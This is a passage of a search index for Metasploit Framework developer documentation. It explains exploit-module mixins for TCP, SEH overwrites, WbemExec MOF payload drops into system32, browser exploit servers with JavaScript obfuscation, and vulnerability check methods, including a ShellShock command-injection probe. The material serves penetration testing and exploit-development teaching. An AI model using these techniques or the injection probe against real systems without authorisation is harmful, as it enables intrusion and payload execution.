remote: Compressing objects: 100% (6/6), done. remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0 Unpacking objects: 100% (6/6), 401 bytes | 200.00 KiB/s, done. space@ubuntu:~$ cd y-find space@ubuntu:~/y-find$ ls -al total 20 drwxrwxr-x 4 space space 4096 Sep 22 12:05 . drwxr-x--- 22 space space 4096 Sep 22 12:05 .. drwxrwxr-x 2 space space 4096 Sep 22 12:05 dir -rw-rw-r-- 1 space space 10 Sep 22 12:05 file.txt drwxrwxr-x 8 space space 4096 Sep 22 12:05 .git space@ubuntu:~/y-find$ cat dir/test_file.txt test space@ubuntu:~/y-find$ cat file.txt some text . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-git-mixin-to-write-an-exploit-module.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-git-mixin-to-write-an-exploit-module.html"
  },"406": {
    "doc": "TCP",
    "title": "How to use the Msf::Exploit::Remote::Tcp mixin",
    "content": "In Metasploit Framework, TCP sockets are implemented as Rex::Socket::Tcp, which extends the built-in Ruby Socket base class. You should always use the Rex socket instead of the native Ruby one because if not, your sockets are not manageable by the framework itself, and of course some features will be missing such as pivoting. The Developer’s Guide in Metasploit’s documentation directory explains how this works pretty well. For module development, normally you wouldn’t be using Rex directly, so instead you’d be using the Msf::Exploit::Remote::Tcp mixin. The mixin already provides some useful features you don’t really have to worry about during development, such as TCP evasions, proxies, SSL, etc. All you have to do is make that connection, send something, receive something, and you’re done. Sounds pretty easy, right? . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#how-to-use-the-msfexploitremotetcp-mixin",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#how-to-use-the-msfexploitremotetcp-mixin"
  },"407": {
    "doc": "TCP",
    "title": "Using the mixin",
    "content": "To use the mixin, simply add the following statement within your module’s class Metasploit3 (or class Metasploit4) scope: . include Msf::Exploit::Remote::Tcp . When the mixin is included, notice there will be the following datastore options registered under your module: . | SSL - Negotiate SSL for outgoing connections. | SSLVersion - The SSL version used: SSL2, SSL3, TLS1. Default is TLS1. | SSLVerifyMode - Verification mode: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER. Default is PEER. | Proxies - Allows your module to support proxies. | ConnectTimeout - Default is 10 seconds. | TCP::max_send_size - Evasive option. Maximum TCP segment size. | TCP::send_delay - Evasive option. Delays inserted before every send. | . If you wish to learn how to change the default value of a datastore option, please read “Changing the default value for a datastore option” . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#using-the-mixin",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#using-the-mixin"
  },"408": {
    "doc": "TCP",
    "title": "Make a connection",
    "content": "To make a connection, simply do the following: . connect . When you do this, the connect method calls Rex::Socket::Tcp.create to create the socket and registers it with the framework. It automatically checks the RHOST/RPORT datastore options (so it knows where to connect to), but you can also manually override them: . # This connects to metasploit.com connect(true, {'RHOST'=>'208.118.237.137', 'RPORT'=>80}) . The connect method will then return the Socket object, which is also accessible globally. But you see, there’s a little more to it. The connect method can also raise some Rex exceptions that you might want to catch, including: . | Rex::AddressInUse - Possible when it actually binds to the same IP/port. | ::Errno::ETIMEDOUT - When Timeout.timeout() waits too long to connect. | Rex::HostUnreachable - Pretty self-explanatory. | Rex::ConnectionTimeout - Pretty self-explanatory. | Rex::ConnectionRefused - Pretty self-explanatory. | . So to sum it up, ideally when you use the connect method, you should rescue these: . rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused . If you are curious where all these exceptions are raised, you can find them in rex/socket/comm/local.rb. ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#make-a-connection",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#make-a-connection"
  },"409": {
    "doc": "TCP",
    "title": "Sending data",
    "content": "There are several ways to send data with the Tcp mixin. To make things easier and safer, we recommend just using the put method: . sock.put \"Hello, World!\" . The reason the put method is safer is because it does not allow the routine to hang forever. By default, it doesn’t wait, but if you want to make this more flexible, you can do this: . begin sock.put(\"data\", {'Timeout'=>5}) rescue ::Timeout::Error # You can decide what to do if the writing times out end . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#sending-data",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#sending-data"
  },"410": {
    "doc": "TCP",
    "title": "Receiving data",
    "content": "Now, let’s talk about how to receive data. Mainly there are three methods you can use: get_once, get, and timed_read. The difference is that get_once will only poll the stream once to see if there’s any data available to read, whereas the get method will keep reading until there is no more. As for timed_read, it’s basically the read method wrapped in a Timeout. The following demonstrates how get_once is used: . begin buf = sock.get_once rescue ::EOFError end . Note that get_once may also return nil if no data is read, or raise an EOFError if it receives nil as data. So please make sure you’re handling nil in your module. The data reading methods can be found in lib/rex/io/stream.rb. ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#receiving-data",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#receiving-data"
  },"411": {
    "doc": "TCP",
    "title": "Disconnecting",
    "content": "To disconnect the connection, simply do: . disconnect . It is VERY important you disconnect in an ensure block, obviously to make sure you always disconnect if something goes wrong. If you don’t do this, you may end up with a module that can only make one request to the server (that very first one), and the rest are broken. ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#disconnecting",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#disconnecting"
  },"412": {
    "doc": "TCP",
    "title": "Full example",
    "content": "The following example should demonstrate how you would typically want to use the Tcp mixin: . # Sends data to the remote machine # # @param data [String] The data to send # @return [String] The received data def send_recv_once(data) buf = '' begin connect sock.put(data) buf = sock.get_once || '' rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e elog(\"#{e.class} #{e.message}\\n#{e.backtrace * \"\\n\"}\") ensure disconnect end buf end . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#full-example",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html#full-example"
  },"413": {
    "doc": "TCP",
    "title": "TCP",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-msf-exploit-remote-tcp-mixin.html"
  },"414": {
    "doc": "SEH Exploitation",
    "title": "SEH Exploitation",
    "content": "Exception handler overwriting was once a very popular technique to exploit stack buffer overflows, but isn’t so common anymore in newer programs because most likely they’re compiled with SafeSEH. At one point, even with SafeSEH enabled, it was still possible to abuse an exception handler by heap spraying, but of course, memory protections didn’t stop there. DEP/ASLR eventually came to the rescue, so that pretty much ended the glory days of SEH exploits. You can probably still find vulnerable applications not compiled with SafeSEH, but chances are the app is outdated, no longer maintained, or it is more of a learning experiment for the developer. Oh, and there’s probably an exploit for that already. Nonetheless, exploiting a stack buffer overflow with exception handling is still fun, so if you do come across it, here’s how it’s supposed to be written with Metasploit’s Seh mixin. Requirements . To be able to use the SEH mixin, some exploitable requirements must be met: . | The vulnerable program does not have SafeSEH in place. | No DEP (Data Execution Prevention). The mixin uses a short jump to be able to execute the payload, which means the memory must be executable. DEP, as the name implies, prevents that. | . Usage . First, make sure you include the Seh mixin under the scope of your module’s Metasploit3 class: . include Msf::Exploit::Seh . Next, you need to set up a Ret address for the SE handler. This address should be placed in your module’s metadata, specifically under Targets. In Metasploit, each target is actually an array of two elements. The first element is just the name of the target (and there is currently no strict naming style), the second element is actually a hash that contains information specific to that target, such as the target address. Here’s an example of setting up a Ret address: . 'Targets' => [ [ 'Windows XP', {'Ret' => 0x75022ac4 } ] # p/p/r in ws2help.dll ] . As you can see, it’s also a good habit to document what the Ret address does, and which DLL it points to. Ret is actually kind of a special key, because it can be retrieved by using target.ret in the module. In our next examples, you will see target.ret being used instead of coding the target address raw. If you need a tool to find a POP/POP/RET for the Ret address, you can use Metasploit’s msfbinscan utility, which is located under the tools directory. OK now, let’s move on to the methods. There are two methods provided by the Seh mixin: . | generate_seh_payload - Generates a fake SEH record with the payload attached right after. Here’s an example: | . buffer = '' buffer << \"A\" * 1024 # 1024 bytes of padding buffer << generate_seh_payload(target.ret) # SE record overwritten after 1024 bytes . The actual layout of buffer should look like this in memory: . [ 1024 bytes of 'A' ][ A short jump ][ target.ret ][ Payload ] . | generate_seh_record - Generates a fake SEH record without the payload, in case you prefer to place the payload somewhere else. Code example: | . buffer = '' buffer << \"A\" * 1024 # 1024 bytes of padding buffer << generate_seh_record(target.ret) buffer << \"B\" * 1024 # More padding . The memory layout should look like this: . [ 1024 bytes of 'A' ][ A short jump ][ target.ret ][ Padding ] . References . | https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ | https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/exploitation/seh.rb | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/seh.rb | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-the-seh-mixin-to-exploit-an-exception-handler.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-the-seh-mixin-to-exploit-an-exception-handler.html"
  },"415": {
    "doc": "WbemExec",
    "title": "WbemExec",
    "content": "Windows Management Instrumentation (WMI) is Microsoft’s implementation of Web-Based Enterprise Management (WBEM), which uses Managed Object Format (MOF) to create Common Information Model (CIM) classes. The security community was actually unfamiliar with the evilness of this technology until the birth of Stuxnet, which used a MOF file to exploit a vulnerability allowing the attacker to create files via a fake Printer Spooler service. This technique was later reverse-engineered and demonstrated in Metasploit’s ms10_061_spoolss.rb module, and that significantly changed how we approach write-privilege attacks. Generally speaking, if you find yourself being able to write to system32, you can most likely take advantage of this technique. Requirements . To be able to use the WbemExec mixin, you must meet these requirements: . | Write permission to C:\\Windows\\System32\\ | Write permission to C:\\Windows\\System32\\Wbem\\ | The target must NOT be newer than Windows Vista (so mostly good for XP, Win 2003, or older). This is more of a limitation from the API, not the technique. Newer Windows operating systems need the MOF file to be pre-compiled first. | . Usage . First, include the WbemExec mixin under the scope of your MetasploitModule class. You will also need the EXE mixin to generate an executable: . include Msf::Exploit::EXE include Msf::Exploit::WbemExec . Next, generate a payload name and the executable: . payload_name = \"evil.exe\" exe = generate_payload_exe . And then generate the mof file using the generate_mof method. The first argument should be the name of the mof file, and the second argument is the payload name: . mof_name = \"evil.mof\" mof = generate_mof(mof_name, payload_name) . Now you’re ready to write/upload your files to the target machine. Always make sure you upload the payload executable first to C:\\Windows\\System32\\. upload_file_to_system32(payload_name, exe) # Write your own upload method . Now you can upload the mof file to C:\\Windows\\System32\\wbem\\: . upload_mof(mof_name, mof) # Write your own upload method . Once the mof file is uploaded, the Windows Management Service should pick that up and execute it, which will end up executing your payload in system32. Also, the mof file will automatically be moved out of the mof directory after use. References . | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/wbemexec.rb | https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/ms10_061_spoolss.rb | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-use-wbemexec-for-a-write-privilege-attack-on-windows.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-use-wbemexec-for-a-write-privilege-attack-on-windows.html"
  },"416": {
    "doc": "BrowserExploitServer",
    "title": "BrowserExploitServer",
    "content": "The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are: . | Msf::Exploit::Remote::HttpServer - The most basic form of an HTTP server. | Msf::Exploit::Remote::HttpServer::HTML - which provides Javascript functions that the module can use when crafting HTML contents. | Msf::Exploit::Remote::BrowserExploitServer - which includes features from both HttpServer and HttpServer::HTML, but with even more goodies. This writeup covers the BrowserExploitServer mixin. | . The Automatic Exploitation Procedure . The BrowserExploitServer mixin is the only mixin specially designed for browser exploitation. Before you use this mixin, you should understand what it does behind the scenes for you: . | It automatically collects the browser information, including things like: OS name, version, browser name, browser version, whether a proxy is used, Java plugin version, Microsoft Office version, etc, etc. If the browser doesn’t have Javascript enabled, then it knows less about the target. All the info gathered will be stored in a profile managed by the mixin. | The mixin will then tag the browser to track the session. It will also use the same tag to retrieve the profile when needed. | Before the mixin decides if it should serve the exploit to the browser, it will check with the module for any exploitable requirements. If the requirements aren’t met, it will send a 404 to the browser, and the operation bails. | If the requirements are met, the mixin will pass the profile (information about the browser gathered during the detection stage) to the module, and let it take over the rest. | . Hint: In the module, you can check the :source key in the profile to determine whether Javascript is enabled or not: If the :source is “script”, it means Javascript is enabled. If it’s “headers” (as in HTTP headers), then the browser has Javascript disabled. Setting Exploitable Requirements . Being able to set browser requirements is an important feature of the mixin. It allows your attack to be smarter, more targeted, and prevents accidents. Here’s a scenario: Say you have a vulnerability against Internet Explorer that only affects a specific range of MSHTML builds, you can set the :os_name, :ua_name, :ua_ver, and :mshtml_build to make sure it doesn’t blindly exploit against anything else. The :mshtml_build requirement can be found in “Product version” under MSHTML’s file properties. Exploitable browser requirements are defined under “BrowserRequirements” in the module’s metadata. Here’s an example of defining a vulnerable target running some ActiveX control: . 'BrowserRequirements' => { source: /script/i, activex: [ { clsid: '{D27CDB6E-AE6D-11cf-96B8-444553540000}', method: 'LoadMovie' } ], os_name: /win/i } . You can also define target-specific requirements. This is also how the mixin is able to automatically select a target, and you can get it with the “get_target” method. Here’s an example of how to define target-specific requirements for IE8 on Win XP and IE 9 on Win 7: . 'BrowserRequirements' => { :source => /script|headers/i, 'ua_name' => HttpClients::IE, }, 'Targets' => [ [ 'Automatic', {} ], [ 'Windows XP with IE 8', { :os_name => 'Windows XP', 'ua_ver' => '8.0', 'Rop' => true, 'Offset' => 0x100 } ], [ 'Windows 7 with IE 9', { 'os_name' => 'Windows 7', 'ua_ver' => '9.0', 'Rop' => true, 'Offset' => 0x200 } ] ] . You can use these for :os_name: . | Constant | Purpose | . | OperatingSystems::Match::WINDOWS | Match all versions of Windows | . | OperatingSystems::Match::WINDOWS_95 | Match Windows 95 | . | OperatingSystems::Match::WINDOWS_98 | Match Windows 98 | . | OperatingSystems::Match::WINDOWS_ME | Match Windows ME | . | OperatingSystems::Match::WINDOWS_NT3 | Match Windows NT 3 | . | OperatingSystems::Match::WINDOWS_NT4 | Match Windows NT 4 | . | OperatingSystems::Match::WINDOWS_2000 | Match Windows 2000 | . | OperatingSystems::Match::WINDOWS_XP | Match Windows XP | . | OperatingSystems::Match::WINDOWS_2003 | Match Windows Server 2003 | . | OperatingSystems::Match::WINDOWS_VISTA | Match Windows Vista | . | OperatingSystems::Match::WINDOWS_2008 | Match Windows Server 2008 | . | OperatingSystems::Match::WINDOWS_7 | Match Windows 7 | . | OperatingSystems::Match::WINDOWS_2012 | Match Windows 2012 | . | OperatingSystems::Match::WINDOWS_8 | Match Windows 8 | . | OperatingSystems::Match::WINDOWS_81 | Match Windows 8.1 | . | OperatingSystems::Match::LINUX | Match a Linux distro | . | OperatingSystems::Match::MAC_OSX | Match Mac OSX | . | OperatingSystems::Match::FREEBSD | Match FreeBSD | . | OperatingSystems::Match::NETBSD | Match NetBSD | . | OperatingSystems::Match::OPENBSD | Match OpenBSD | . | OperatingSystems::Match::VMWARE | Match VMWare | . | OperatingSystems::Match::ANDROID | Match Android | . | OperatingSystems::Match::APPLE_IOS | Match Apple IOS | . You can use these for :ua_name: . | Constant | Value | . | HttpClients::IE | “MSIE” | . | HttpClients::FF | “Firefox” | . | HttpClients::SAFARI | “Safari” | . | HttpClients::OPERA | “Opera” | . | HttpClients::CHROME | “Chrome” | . More of these constants can be found here: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/constants.rb . All currently supported requirements by the mixin can be found here (see REQUIREMENT_KEY_SET): https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/browser_exploit_server.rb#L46 . Set up a listener . After the detection stage and the requirement check, the mixin will trigger the “on_request_exploit” callback method, that’s where you handle the HTTP request, craft the HTML, and send back the exploit response. Here’s an example of how to set up “on_request_exploit”: . # # Listens for the HTTP request # cli is the socket # request is the Rex::Proto::Http::Request object # target_info is a hash that contains all the browser info (aka the profile) # def on_request_exploit(cli, request, target_info) print_status(\"Here's what I know about the target: #{target_info.inspect}\") end . Crafting HTML with BrowserExploitServer . There are two coding styles the BrowserExploitServer mixin supports: The good old HTML, or ERB template. The first is pretty self-explanatory: . def on_request_exploit(cli, request, target_info) html = %Q| <html> Hello, world! </html> | send_exploit_html(cli, html) end . ERB is a new way to write Metasploit browser exploits. If you’ve written one or two web applications, this is no stranger to you. When you’re using the BrowserExploitServer mixin to write an exploit, what really happens is you’re writing a rails template. Here’s an example of using this feature: . def on_request_exploit(cli, request, target_info) html = %Q| <html> Do you feel lucky, punk?<br> <% if [true, false].sample %> Lucky!<br> <% else %> Bad luck, bro!<Br> <% end %> </html> | send_exploit_html(cli, html) end . If you want to access local variables or arguments, make sure to pass the binding object to send_exploit_html: . def exploit_template(target_info, txt) txt2 = \"I can use local vars!\" template = %Q| <% msg = \"This page is generated by an exploit\" %> <%=msg%><br> <%=txt%><br> <%=txt2%><br> <p></p> Data gathered from source: #{target_info[:source]}<br> OS name: #{target_info[:os_name]}<br> UA name: #{target_info[:ua_name]}<br> UA version: #{target_info[:ua_ver]}<br> Java version: #{target_info[:java]}<br> Office version: #{target_info[:office]} | return template, binding() end def on_request_exploit(cli, request, target_info) send_exploit_html(cli, exploit_template(target_info, \"I can use arguments too!\")) end . The BrowserExploitServer mixin also offers plenty of other things useful while crafting the exploit. For example: it can generate a target-specific payload when you call the “get_payload” method. It also gives you access to the RopDb mixin, which contains a collection of ROPs to bypass DEP (Data Execution Prevention). Make sure to check out the API documentation for more information. To get things started, here’s a code example you can use to start developing your browser exploit: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info = {}) super( update_info( info, 'Name' => 'BrowserExploitServer Example', 'Description' => %q{ This is an example of building a browser exploit using the BrowserExploitServer mixin }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r' ], 'References' => [ [ 'URL', 'http://metasploit.com' ] ], 'Platform' => 'win', 'BrowserRequirements' => { source: /script|headers/i }, 'Targets' => [ [ 'Automatic', {} ], [ 'Windows XP with IE 8', { 'os_name' => 'Windows XP', 'ua_name' => 'MSIE', 'ua_ver' => '8.0' } ], [ 'Windows 7 with IE 9', { 'os_name' => 'Windows 7', 'ua_name' => 'MSIE', 'ua_ver' => '9.0' } ] ], 'Payload' => { 'BadChars' => \"\\x00\" }, 'DisclosureDate' => '2013-04-01', 'DefaultTarget' => 0 ) ) end def exploit_template(target_info) template = %( Data source: <%=target_info[:source]%><br> OS name: <%=target_info[:os_name]%><br> UA name: <%=target_info[:ua_name]%><br> UA version: <%=target_info[:ua_ver]%><br> Java version: <%=target_info[:java]%><br> Office version: <%=target_info[:office]%> ) return template, binding end def on_request_exploit(cli, _request, target_info) send_exploit_html(cli, exploit_template(target_info)) end end . JavaScript Obfuscation . BrowserExploitServer relies on the JSObfu mixin to support JavaScript obfuscation. When you’re writing JavaScript, you should always write it like this: . js = js_obfuscate(your_code) . The #js_obfuscate will return a Rex::Exploitation::JSObfu object. To get the obfuscated JavaScript, call the #to_s method: . js.to_s . If you need to access an obfuscated symbol name, you can use the #sym method: . # Get the obfuscated version of function name test() var_name = js.sym('test') . Note that by default, even though your module is calling the #js_obfuscate method, obfuscation will not kick in unless the user sets the JsObfuscate datastore option. This option is an OptInt, which allows you to set the number of times to obfuscate (default is 0). If your BES-based exploit does not want obfuscation at all, always make sure you call the #deregister_options and remove the JsObfuscate option. Like this: . deregister_options('JsObfuscate') . To learn more about Metasploit’s JavaScript obfuscation capabilities, please read How to obfuscate JavaScript in Metasploit. Related Articles: . | How to write a browser exploit using HttpServer | Information About Unmet Browser Exploit Requirements | . ",
    "url": "/docs/development/developing-modules/libraries/http/how-to-write-a-browser-exploit-using-browserexploitserver.html",
    "relUrl": "/docs/development/developing-modules/libraries/http/how-to-write-a-browser-exploit-using-browserexploitserver.html"
  },"417": {
    "doc": "Writing a browser exploit",
    "title": "Writing a browser exploit",
    "content": "The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are Msf::Exploit::Remote::HttpServer, Msf::Exploit::Remote::HttpServer::HTML and Msf::Exploit::Remote::BrowserExploitServer. This writeup covers the HttpServer mixin. The HttpServer mixin is kind of the mother of all HTTP server mixins (like BrowserExploitServer and HttpServer::HTML). To use it, your module is required to have an “on_request_uri” method, which is a callback triggered when the HTTP server receives an HTTP request from the browser. An example of setting up “on_request_uri”: . # # Listens for an HTTP request. # cli is the socket object, and request is a Rex::Proto::Http::Request object # def on_request_uri(cli, request) print_status(\"Client requests URI: #{request.uri}\") end . The “on_request_uri” method is also where you can create the HTTP response. Here are a couple of choices you can use to do that: . | send_not_found(cli) - Sends a 404 to the client. Make sure to pass the cli (socket) object. | send_redirect(cli, location='/', body='', headers={}) - Redirects the client to a new location. | send_response(cli, body, headers={}) - Sends a response to the client. This method is probably what you’ll be using most of the time. | . If you’ve seen some of our exploit modules, you will also see them using Exploit::Remote::HttpServer::HTML instead of Exploit::Remote::HttpServer. Usage is mostly the same, the difference is the Exploit::Remote::HttpServer::HTML mixin gives you access to some Javascript functions like Base64, heap spraying, OS detection, etc. Here’s an example of sending an HTTP response: . # # Sends a \"Hello, world!\" to the client # def on_request_uri(cli, request) html = \"Hello, world!\" send_response(cli, html) end . Also note that in order to handle an HTTP request, it must contain the base URIPATH, which by default is random. This means if you want to handle multiple URIs (possible if you need to handle a redirect or a link), you also need to make sure they have the base URIPATH. To retrieve the base URIPATH, you can use the “get_resource” method, here’s an example: . def serve_page_1(cli) html = \"This is page 1\" send_response(cli, html) end def serve_page_2(cli) html = \"This is page 2\" send_response(cli, html) end def serve_default_page(cli) html = %Q| <html> <a href=\"#{get_resource.chomp('/')}/page_1.html\">Go to page 1</a><br> <a href=\"#{get_resource.chomp('/')}/page_2.html\">Go to page 2</a> </html> | send_response(cli, html) end def on_request_uri(cli, request) case request.uri when /page_1\\.html$/ serve_page_1(cli) when /page_2\\.html$/ serve_page_2(cli) else serve_default_page(cli) end end . Of course, when you write a Metasploit browser exploit there’s a lot more you need to think about. For example, your module probably needs to do browser detection, because it wouldn’t make any sense to allow Chrome to receive an IE exploit, would it? You probably also need to build a payload that’s specific to the target, which means your module needs to know what target it’s hitting, and you have to build a method to customize the exploit accordingly, etc. The HttpServer and HttpServer::HTML mixins provide all kinds of methods to allow you to accomplish all these. Make sure to check out the API documentation (you can either do this by running msf/documentation/gendocs.sh, or just run “yard” in the msf directory), or check out existing code examples (especially the recent ones). To get things started, you can always use the following template to start developing your browser exploit: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'HttpServer mixin example', 'Description' => %q{ Here's an example of using the HttpServer mixin }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r' ], 'References' => [ [ 'URL', 'http://metasploit.com' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Generic', {} ], ], 'DisclosureDate' => '2013-04-01', 'DefaultTarget' => 0 ) ) end def on_request_uri(cli, _request) html = 'hello' send_response(cli, html) end end . If you want to take a closer look at what the mixin can do, see: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/server.rb . ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-browser-exploit-using-httpserver.html",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-browser-exploit-using-httpserver.html"
  },"418": {
    "doc": "How to write a check method",
    "title": "Check Method Output",
    "content": "Module messages are important to the user, because they keep the user informed about what the module is doing, and usually make the module more debuggable. However, you also want to keep your messages in verbose mode, because the output becomes really noisy if the check is used against multiple targets. Ideally, you should only be using these print methods: . | Method | Description | . | vprint_line() | verbose version of print_line | . | vprint_status() | verbose version of print_status that begins with “[*]” | . | vprint_error() | verbose version of print_error that begins with “[x]” | . | vprint_warning() | verbose version of print_warning that begins with “[!]”, in yellow | . Better yet, use the CheckCode description to provide additional information (see below). Note: You shouldn’t be printing if a target is vulnerable or not, as this is automatically handled by the framework when your method returns a check code. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-method-output",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-method-output"
  },"419": {
    "doc": "How to write a check method",
    "title": "Check Codes",
    "content": "Once you have determined the vulnerable state, you should return a check code. Check codes are constants defined in Msf::Exploit::CheckCode, and these are the ones you can use: . | Checkcode | Description | . | Exploit::CheckCode::Unknown | Used if the module fails to retrieve enough information from the target machine, such as due to a timeout. | . | Exploit::CheckCode::Safe | Used if the check fails to trigger the vulnerability, or even detect the service. | . | Exploit::CheckCode::Detected | The target is running the service in question, but the check fails to determine whether the target is vulnerable or not. | . | Exploit::CheckCode::Appears | This is used if the vulnerability is determined based on passive reconnaissance. For example: version, banner grabbing, or simply having the resource that’s known to be vulnerable. | . | Exploit::CheckCode::Vulnerable | Only used if the check is able to actually take advantage of the bug, and obtain some sort of hard evidence. For example: for a command execution type bug, get a command output from the target system. For a directory traversal, read a file from the target, etc. Since this level of check is pretty aggressive in nature, you should not try to DoS the host as a way to prove the vulnerability. | . | Exploit::CheckCode::Unsupported | The exploit does not support the check method. If this is the case, then you don’t really have to add the check method. | . The CheckCode also supports an optional description which is printed by the framework upon completion of the check method. For example: . return CheckCode::Appears('Vulnerable component XYZ is installed') . MetasploitModule#check methods should rescue any known exceptions raised by the methods they call and always return a value of class Msf::Exploit::CheckCode. Basically, that means avoiding the use of fail_with or raising exceptions that are not handled within the check method. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes"
  },"420": {
    "doc": "How to write a check method",
    "title": "Remote Check Example",
    "content": "Here’s an abstract example of how a Metasploit check might be written: . # # Returns a check code that indicates the vulnerable state on an app running on OS X # def check if exec_cmd_via_http(\"id\") =~ /uid=\\d+\\(.+\\)/ # Found the correct ID output, good, indicating our command executed return Exploit::CheckCode::Vulnerable end http_body = get_http_body if http_body if http_body =~ /Something CMS v1\\.0/ # We are able to find the version, therefore we can be more precise about the vuln state return Exploit::CheckCode::Appears elsif http_body =~ /Something CMS/ # All we can tell is that the vulnerable app is running, but no more info to # determine the vuln return Exploit::CheckCode::Detected end else vprint_error(\"Unable to determine due to a HTTP connection timeout\") return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe end . Note: If you are writing an auxiliary module with the Msf::Auxiliary::Scanner mixin, you should declare your check method like this: . def check_host(ip) # Do your thing end . Local Exploit Check Example . Most local exploit checks are done by checking the version of the vulnerable file, which is considered passive, therefore they should be flagging Exploit::CheckCode::Appears. Passive local exploit checks don’t necessarily mean they are less reliable; in fact, they are not bad. But to qualify for Exploit::CheckCode::Vulnerable, your check should go the extra mile, which means either you somehow make the program return a vulnerable response, or you inspect the vulnerable code. An example of making the program return a vulnerable response is ShellShock (the following is specific to VMware): . 
def check check_str = Rex::Text.rand_text_alphanumeric(5) # ensure they are vulnerable to bash env variable bug if cmd_exec(\"env x='() { :;}; echo #{check_str}' bash -c echo\").include?(check_str) && cmd_exec(\"file '#{datastore['VMWARE_PATH']}'\") !~ /cannot open/ Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end . One way to inspect the vulnerable code is to come up with a signature, and see if it exists in the vulnerable process. Here’s an example with adobe_sandbox_adobecollabsync.rb: . # 'AdobeCollabSyncTriggerSignature' => \"\\x56\\x68\\xBC\\x00\\x00\\x00\\xE8\\xF5\\xFD\\xFF\\xFF\" # 'AdobeCollabSyncTrigger' => 0x18fa0 def check_trigger signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length) if signature == target['AdobeCollabSyncTriggerSignature'] return true end return false end def check @addresses = {} acrord32 = session.railgun.kernel32.GetModuleHandleA(\"AcroRd32.exe\") @addresses['AcroRd32.exe'] = acrord32[\"return\"] if @addresses['AcroRd32.exe'] == 0 return Msf::Exploit::CheckCode::Unknown elsif check_trigger return Msf::Exploit::CheckCode::Vulnerable else return Msf::Exploit::CheckCode::Detected end end . Another possible way to inspect is to grab the vulnerable file and use Metasm. But of course, this is a lot slower and generates more network traffic. ",
    "url": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html#remote-check-example",
    "relUrl": "/docs/development/developing-modules/guides/how-to-write-a-check-method.html#remote-check-example"
  },"421": {
    "doc": "How to write a check method",
    "title": "AutoCheck Mixin",
